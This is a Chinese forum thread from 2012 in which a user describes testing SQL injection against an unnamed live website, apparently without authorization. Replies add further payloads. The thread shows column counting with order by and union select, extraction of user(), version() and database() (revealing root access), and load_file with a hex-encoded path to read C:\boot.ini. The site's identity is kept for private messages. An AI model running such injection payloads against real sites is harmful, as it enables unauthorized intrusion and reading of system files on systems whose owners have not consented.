818我手机友情检测某站点的过程

rt.
今天无聊看到叉子一个Php注入教程帖,出于好奇,试了试.结果就是下面这玩意儿……拍砖随意.

x.php?id=739 and 1=2 出错
x.php?id=739 order by 10 正常
然后order by 20,30,正常.接着来,40,query error.35,query error.34,query error.33,正常.此表有33列.
x.php?id=739 and 1=2 union select 1,2,3……33 挑比较明显的14.
x.php?id=739 and 1=2 union……13,user(),15…… 然后……root@localhost!!!
然后……不好意思,没往下玩.
下午接着更.

whtsky	2012-02-14 13:05
.sql果然悲剧

墨阐	2012-02-14 13:18
在14位置以version()代替,得到5.14-community-nt,MySQL版本5以上,Windows系统. database(),为web4-db1. load_file(0x633A5C626F6F742E696E69),括号中为"C:\boot.ini"的hex.成功读取,得知系统为Windows Server 2003 Enterprise. 内容来自[手机版]

jybox	2012-02-14 14:19
某站点是什么

jybox	2012-02-14 14:24
某站点是什么

jybox	2012-02-14 14:25
某站点是什么

墨阐	2012-02-14 14:32
@jybox 某站点……私聊内容来自[手机版]

jybox	2012-02-14 14:58